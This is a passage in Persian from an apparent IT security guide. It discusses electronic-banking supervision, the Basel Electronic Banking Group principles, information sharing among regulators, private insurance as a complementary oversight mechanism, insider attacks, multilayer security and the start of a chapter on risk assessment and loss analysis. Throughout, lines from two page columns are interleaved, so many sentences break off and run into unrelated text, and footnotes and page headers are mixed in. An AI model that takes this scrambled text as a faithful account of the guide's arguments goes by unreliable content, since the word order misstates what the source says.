ﺗﻐﻴﻴﺮﺍﺕ ﻳﺎ ﺍﻧﺠﺎﻡ ﺍﺻﻼﺣﺎﺕ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺩﺭ ﻧﻈـﺎﺭﺕ ﻭ ﺍﺭﺯﻳـﺎﺑﻲ
ﻧﻈﺎﺭﺕ ،ﻭ ﭘﻴـﺸﮕﻴﺮﻱ ،ﺑـﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﺭﺍﺋـﻪﺩﻫﻨـﺪﮔﺎﻥ
ﺟﻬﺖ ﺗﻄﺒﻴﻖ ﺭﻭﺍﻟﻬﺎ ﺑﺎ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺷﻜﻞ ﮔﺮﻓﺖ .ﺩﺭ ﺳـﺎﻝ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻔﻴﺪ ﺑﺎﺷﺪ .ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑـﻮﻳﮋﻩ ﺑـﺮﺍﻱ ﺷـﺮﻛﺘﻬﺎﻱ
EBG ،۲۰۰۱ﺍﺻــﻮﻝ ﻣــﺪﻳﺮﻳﺖ ﻣﺨــﺎﻃﺮﻩ ﺑــﺮﺍﻱ ﺑﺎﻧﻜــﺪﺍﺭﻱ
ﺗﺠﺎﺭﻱ ﻛﻪ ﺩﺭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﺍﺭﺍﺋﻪ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ ﻛﻪ ﺷﺎﻣﻞ ﺍﺻـﻮﻝ ﺧﺎﺻـﻲ ﺑـﻮﺩ ﻛـﻪ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ ﻣﻄﺮﺡ ﻣﻲﺑﺎﺷﺪ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ ،ﻛﻨﺘﺮﻟﻬـﺎﻱ
ﺩﺍﺧﻠــﻲ ،ﺟﺎﻣﻌﻴــﺖ ﺍﻣﻨﻴــﺖ ﺳــﺮﻣﺎﻳﻪﻫــﺎ ﻭ ﻫﻤﭽﻨــﻴﻦ ﺟﺎﻣﻌﻴــﺖ ﻧﻴﺎﺯﻫﺎﻱ ﺳﺮﻣﺎﻳﻪﺍﻱ
ﺍﻃﻼﻋﺎﺕ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻋـﻼﻡ ﻣـﻲﻛـﺮﺩ .ﺣـﻮﺯﻩﻫـﺎﻱ
ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺟﺪﻳﺪ ﺑﺎﺳﻞ ٣٨ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪ -ﺑﻮﻳﮋﻩ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑـﻪ
ﻧﻈﺎﺭﺕ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﺩﺭ ﭼﻨﺪ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺗﻐﻴﻴﺮ ﺟﻬﺖ ﻋﻤﺪﻩﺍﻱ ﭘﻴـﺪﺍ
ﺗﻬﺪﻳﺪﻫﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﻣﺮﺑﻮﻁ ﻣﻲﺷﻮﻧﺪ -ﺑـﻪ ﻣﺨـﺎﻃﺮﺓ ﺍﺯ ﺩﺳـﺖ
ﻣﻲﻛﻨﻨﺪ .ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺻﻨﻌﺖ ﺍﻣﻨﻴﺖ ﺑﺎ ﻣﻌﺮﻓﻲ ﻭ ﺗﻜﻴﻪ ﺑﺮ ﺍﻧﺒـﻮﻩ
ﺩﺍﺩﻥ ﺷﻬﺮﺕ ﻳﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺍﺳﺘﺮﺍﺗﮋﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺗﻐﻴﻴﺮ ﺍﻟﮕﻮ ﺭﺍ ﺗﺠﺮﺑـﻪ ﻛـﺮﺩ،
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﭙﺮﺩﺍﺧﺘﻪﺍﻧﺪ .ﺍﺯ ﺍﻳﻨﺮﻭ ﺍﻳﻦ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ﻛـﻪ
ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻧﻈـﺎﺭﺕ ﺑـﺎﻧﻜﻲ ﻧﻴـﺰ ﺗﻐﻴﻴـﺮ ﻣﺮﻛـﺰ ﺛﻘـﻞ ﺻـﻨﻌﺖ
ﻭﻗﺘﻲ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﻗﻴـﻖ ﻧﻴـﺴﺖ ﻭ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺗﺠﺮﺑﻪ ﺧﻮﺍﻫﺪ ﻧﻤﻮﺩ.
ﺍﺭﺯﻳﺎﺑﻲ ﺧﺴﺎﺭﺍﺗﻲ ﻛﻪ ﺑﻪ ﺷﻬﺮﺕ ﻭﺍﺭﺩ ﻣـﻲﺷـﻮﺩ ﺳـﺨﺖ ﺍﺳـﺖ،
ﻫﻤﺎﻫﻨﮕﻲ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﺭﻭﻥﻣﺮﺯﻱ ﻭ ﺑﺮﻭﻥﻣﺮﺯﻱ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻣﺨﺎﻃﺮﺍﺕ ﻋﻤﻠﻴﺎﺗﻲ ﺑﺎﻧﻜﻲ ﭼﻴـﺴﺖ؟ ﺑـﺎ
ﺗﻮﺟﻪ ﺑﻪ ﻣﺴﺌﻠﻪ ﺗﻌﻴﻴﻦ ﺳـﺮﻣﺎﻳﺔ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴـﺖ
ﻳﻚ ﻣﻮﺿﻮﻉ ﻛﻠﻴﺪﻱ ﻛﻪ ﺍﻛﺜﺮ ﻛﺸﻮﺭﻫﺎ ﺑﺎ ﺁﻥ ﺭﻭﺑﺮﻭ ﻫﺴﺘﻨﺪ ﻧﻴـﺎﺯ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻳﻚ ﺭﻭﺵ ﻣﺆﺛﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺭﻭﻧـﺪ
ﺑﻪ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ﻭ ﺩﻭﺍﻳـﺮ
ﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺍﺭﺯﻳﺎﺑﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺮﻣﻴﻢ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘـ ﹺ
ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ )ﻧﻴﺮﻭﻫـﺎﻱ ﺍﻧﺘﻈـﺎﻣﻲ( ﺍﺳـﺖ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ
ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﺛﺒـﺖ ﮔﺰﺍﺭﺷـﺎﺕ ﭼﻨـﻴﻦ
ﻭﻗﺎﻳﻌﻲ ﺑﺎﺷﺪ ٣٩.ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻘﺎﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺍﺋﻪﺩﻫﻨـﺪﮔﺎﻥ
ﻱ ﺧـﻮﺩ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ،ﺻﻨﻌﺖ ﺑﻴﻤـﻪ ﺑـﻪ ﺧـﻮﺩ ﹺ ۴۰
ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺳﺎﺧﺘﺎﺭ ﻣﺠﺪﺩ ﺑﻴﺎﺑﺪ ﻭ ﺑﻪ ﻳﻚ ﺣﺎﻟـﺖ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺭﺍ ﺑـﻪ ﺑﻴﻤـﻪ ﻛـﺮﺩﻥ ﺧـﻮﺩ ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ ﺟﻮﺍﻧـﺐ
ﺍﺳﺘﻮﺍﺭ ﺑﺮﺳﺪ؛ ﺍﻣﺎ ﺩﺭ ﻫﺮ ﺣﺎﻝ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺍﻳـﻦ ﺷـﺮﺍﻳﻂ ﻧﻴـﺰ ﺟﻠـﻮﮔﻴﺮﻱ
ﻛﺮﺩ.
41 Banking Supervision’s Electronic Banking 38 Basel
Group ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﺑﻨﺪ ۶ﻫﻤﻴﻦ ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ ۳۹
١٣٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻣﺨــﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺷــﻮﻧﺪ ،ﺍﻳــﻦ ﺩﺳــﺘﻪ ﺍﺯ ﭼﻨﺪﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻬـﻢ ﺩﺍﺭﻧـﺪ ،ﺍﻣـﺎ
ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ. ﻻ ﺍﻃﻼﻋــﺎﺕ ﻣﻴــﺎﻥ ﺍﻳــﻦ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺑــﺎ ﻳﻜــﺪﻳﮕﺮ ﻳــﺎ ﺑــﺎﻣﻌﻤــﻮ ﹰ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺮﻭﻥﻣﺮﺯﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪ ﻧﻤـﻲﺷـﻮﻧﺪ )ﮔـﺎﻫﻲ
ﺻﻨﻌﺖ ﺑﻴﻤﺔ ﺟﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻴـﺮﻭﻱ ﻣﻬـﻢ ﺑـﺮﺍﻱ
ﺍﻭﻗﺎﺕ ﺑﻪ ﺩﻻﻳﻞ ﺣﻘﻮﻗﻲ( .ﻣﻮﺿﻮﻉ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺳـﺎﺯﻣﺎﻧﻬﺎ
ﺗﻐﻴﻴﺮ ﺍﻟﺰﺍﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻜﺎﺭ ﺭﻭﺩ .ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧـﺪ
ﺩﺭ ﺍﺑﻌﺎﺩ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻓﺮﺍﺗﺮ ﺍﺯ ﺩﺍﻣﻨﺔ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺳﺖ .ﺩﺭ ﻫﺮ
ﻣﻮﺟﺐ ﺑﻬﺒﻮﺩ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺣـﺪﺍﻗﻠﻲ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ
ﺻﻮﺭﺕ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺩﻭﻟﺘﻬـﺎ ﺳـﻌﻲ ﺩﺍﺭﻧـﺪ ﺑـﺎ ﺟـﺮﺍﺋﻢ ﻣﻮﺟـﻮﺩ ﺩﺭ
ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﻮﺩ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺻﻨﻌﺖ ﺟﻬﺎﻧﻲ ﺧـﺪﻣﺎﺕ
ﻣﺤﻴﻂ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﻣﻘﺎﺑﻠﻪ ﺑﺮﺧﻴﺰﻧﺪ ،ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﻴـﺰ
ﻣﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﺩﺭ ﺍﻳـﻦ ﺑﺤـﺚ ﻣﻮﺿـﻮﻋﺎﺗﻲ ﻛﻠﻴـﺪﻱ ﺑـﻪ
ﻻﻳﻪﺑﻨﺪﻱﺷﺪﻩ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭘﻴﺸﻨﻴﺎﺯ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﺗﺤﺮﻳﻚ ﻛﻨـﺪ.
ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ.
ﺛﺎﻧﻴﹰﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻤـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﺑﺨﻮﺍﻫﻨﺪ ﻛﻪ ﺑﻪ ﻓﺮﻭﺷﻨﺪﮔﺎﻧﻲ ﻣﺮﺍﺟﻌـﻪ ﻧﻤﺎﻳﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺭﺍﺋـﻪ
ﺭﻛﻦ ﭼﻬﺎﺭﻡ:
ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﺄﻳﻴﺪﺷـﺪﻩ ﻭ ﻗﺎﺑـﻞ
ﻗﺒﻮﻝ ﺻﻨﻌﺘﻲ ﺑﻬﺮﻩ ﻣﻲﺑﺮﻧﺪ ﺗﺎ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﺣﺘﻤـﺎﻟﻲ ﺭﺍ ﻛـﺎﻫﺶ ﻧﻘﺶ ﺑﻴﻤﺔ ﺧﺼﻮﺻﻲ ﺑﻪ ﻋﻨﻮﺍﻥ
ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ .ﺛﺎﻟﺜـﹰﺎ ﺷـﺮﻛﺘﻬﺎﻱ ﺑﻴﻤـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ﺭﺍ ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻈﺎﺭﺕ ﺗﻜﻤﻴﻠﻲ
ﺗﺮﻏﻴﺐ ﻛﻨﻨﺪ ﺗﺎ ﻣﺆﺳﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺭﺍ ﻣﻠـﺰﻡ ﻧﻤﺎﻳﻨـﺪ ﻛـﻪ
ﺑﺨﺶ ﺳﻮﻡ
42 Certification
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٣٤
ﻧﻈﺎﺭﺗﻲ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﻧـﻮﻳﻦ ﺑـﺎ ﺍﺑﺰﺍﺭﻫـﺎﻳﻲ ﺍﻧﺠﺎﻡﺷﺪﻥ ﻣﺴﺌﻮﻟﻴﺖ ﻫﺮ ﺑﺨﺶ ﺍﻫﻤﻴﺖ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ؛ ﻭ
ﻧﻈﻴﺮ ﻃﺮﺣﻬﺎﻱ ﺗﺒﺎﺩﻝ ﻓﻌﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﻛﺎﺭﻛﻨﺎﻥ؛ ﻲ ﺍﻣـﺮﻭﺯ ،ﺩﺭ ﺁﻏـﺎﺯ
ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺻـﻨﻌﺖ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟ ﹺ
ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻤﺮﻛﺰ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩ ﻭ ﺗﻐﻴﻴـﺮﺍﺕ
ﻃﺮﺍﺣﻲ ﺩﻭﺭﻩﻫﺎﻱ ﻣﺘﻤﺮﻛﺰ ﺑـﺮﺍﻱ ﻣﻤﺘﺤﻨـﺎﻥ ﺑـﺎ ﻛﻤـﻚ •
ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺩﻫﺔ ﮔﺬﺷـﺘﻪ ﺑـﻮﺩ ﻛـﻪ ﻭﺍﺑـﺴﺘﮕﻴﻬﺎﻱ ﺩﺭﻭﻧـﻲ ﺍﻳـﻦ
ﻣﺆﺳــﺴﻪ ﭘﺎﻳــﺪﺍﺭﻱ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ ٥١ﻳــﺎ ﺩﻳﮕــﺮ ﻣﺮﺍﻛــﺰ
ﺳﻴﺴﺘﻢ ﺭﺍ ﮔﺴﺘﺮﺵ ﺩﺍﺩﻩ ﻭ ﺑﻴﺸﺘﺮ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺁﻣﻮﺯﺷﻲ؛
ﺗﺪﻭﻳﻦ ﻳﻚ ﻃﺮﺡ ﭼﻨﺪﻣﻨﻈﻮﺭﺓ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺮﺍﻱ ﺁﻣـﻮﺯﺵ • ﺭﻛﻦ ﻫﻔﺘﻢ:
ﻣﺘﺨﺼﺼﻴﻦ ﺁﻳﻨﺪﺓ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻭ ﺑﻄﻮﺭ ﻫﻤﺰﻣـﺎﻥ
ﺁﻣﻮﺯﺵ ﻭ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ
ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺩﺍﻧﺶ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ.
ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺭﻛﻦ ﻫﺸﺘﻢ: ﺗﺤﻠﻴﻞ ﺁﻣﺎﺭﻱ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺑﻴﺶ ﺍﺯ
ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ %۵۰ﺣﻤﻼﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ
ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ .ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺑﺎ ﺗﺤﺼﻴﻼﺕ ﻛـﻢ
ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺍﺟﺰﺍﻱ ﺑﻨﻴﺎﺩﻱ ﻳﻚ
ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤـﻼﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺁﺳـﻴﺐﭘـﺬﻳﺮﺗﺮ ﺍﺳـﺖ .ﺑـﺮﻋﻜﺲ،
ﻃــﺮﺡ ﻣﻨﺎﺳــﺐ ﺑــﺮﺍﻱ ﺣﻔــﻆ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫــﺎ ﻭ ﻛــﺎﻫﺶ
ﺑﺨﺶ ﺳﻮﻡ
ﻣﺘﺼﻞ ﻣﻲﻛﻨﻨﺪ ﺍﻏﺎﺯ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﻣﺤﻴﻂ ﻛﺎﺭ ،ﺩﺍﺩﻩﻫـﺎﻱ ﺧـﺎﻡ
ﻧﻈﻴﺮ ﺳﻮﺍﺑﻖ ﻣﺸﺘﺮﻳﺎﻥ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺮﺍﻱ ﺭﻗﺒـﺎ ﻭ
ﺗﺒﻬﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻫﺪﺍﻓﻲ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳﺖ ﻭ ﺑﻪ ﺗﻮﺟﻪ ﺧﺎﺹ ﻧﻴﺎﺯ
٥٥
ﺩﺍﺭﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﭘﻴﺸﺮﻓﺘﻪﺗﺮ ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨـﻮﻱ
ﻱ ﻣﻨﺤﺼﺮ ﺑﻔـﺮﺩ ﻧﻈﻴﺮ ﺍﺳﻨﺎﺩ ﺗﺤﻘﻴﻘﺎﺕ ﻋﻠﻤﻲ ﻳﺎ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻛﺎﺭ ﹺ ﻓﺼﻞ ﺳﻮﻡ
ﻲ ﻭﻳـﮋﻩ ﻫـﺴﺘﻨﺪ.ﺍﺭﺯﺵ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ﻭ ﻧﻴﺎﺯﻣﻨﺪ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﺍﻣﻨﻴﺘ ﹺ
ﺩﺭ ﺩﻧﻴﺎﻳﻲ ﻛﻪ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺭﻗﺎﺑﺖ ﺩﺭ ﺁﻥ ﺷﺪﺕ ﻣﻲﮔﻴﺮﺩ ،ﺳـﺮﻗﺖ
ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ
ﺩﺍﺩﻩﻫﺎﻱ ﺧﺎﻡ ﻭ ﺩﺍﺭﺍﺋﻴﻬﺎﻱ ﻓﻜﺮﻱ ﺍﺯ ﻃﺮﻳﻖ ﺭﺍﻳﺎﻧﻪ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ
ﺍﺳﺖ .ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ "ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ" ﻛﻪ ﺩﺭ ﻧﮕﺮﺵ ﻛﻠـﻲ ﻛﻠﻴﺎﺕ
ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﺪﻳﺮﻳﺖ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ،ﺁﻣـﻮﺯﺵ ﻭ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ٥٣ﻭ ﺗﺤﻠﻴـﻞ ﺯﻳـﺎﻥ ٥٤ﻭ ﺁﺳـﻴﺒﻬﺎﻱ
ﻫﻮﺷﻴﺎﺭﺳﺎﺯﻱ ﻛﺎﺭﻛﻨﺎﻥ ،ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﻔﺎﻑ ﺩﺭﻭﻥ ﺳـﺎﺯﻣﺎﻥ ،ﺑـﻪ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺗﺠﺎﺭﻱ ﺑﺮﺭﺳﻲ ﻣﻲﺷـﻮﻧﺪ؛ ،ﻣﻨـﺸﺄ ،ﻋﻤﻠﻜـﺮﺩ
ﻛﺎﻫﺶ ﺧﻄﺮﺍﺕ ﻧﺎﺷـﻲ ﺍﺯ ﺗﺨﻠﻔـﺎﺕ ﺍﻣﻨﻴـﺖ ﻓﻴﺰﻳﻜـﻲ ﻭ ﺍﻣﻨﻴـﺖ ﻣﺤﺘﻤﻞ ،ﻭ ﺷﺪﺕ ﺍﺛـﺮﺍﺕ ﮔـﺴﺘﺮﻩﺍﻱ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮ
ﺳﺎﻳﺒﺮ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ. ﻲ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺭﻭﺯﻣﺮﻩ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧـﺪ؛ ﻧﻜـﺎﺕ ﺍﺻـﻠ ﹺ
ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺻﺤﻴﺢ ﺗﺸﺮﻳﺢ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺻﻮﻝ ﺍﺳﺎﺳـﻲ
ﺑﺨﺶ ﺳﻮﻡ
ﺧﻮﺩ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻭﺍﻗﻌﻲ ﻧﻴـﺰ ﻣـﻮﺭﺩ
ﺍﮔﺮﭼــﻪ ﻃﺮﺣﻬــﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻣــﺸﺘﺮﻛﻲ ﺑــﺮﺍﻱ ﺍﻳﻤــﻦﺳــﺎﺯﻱ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
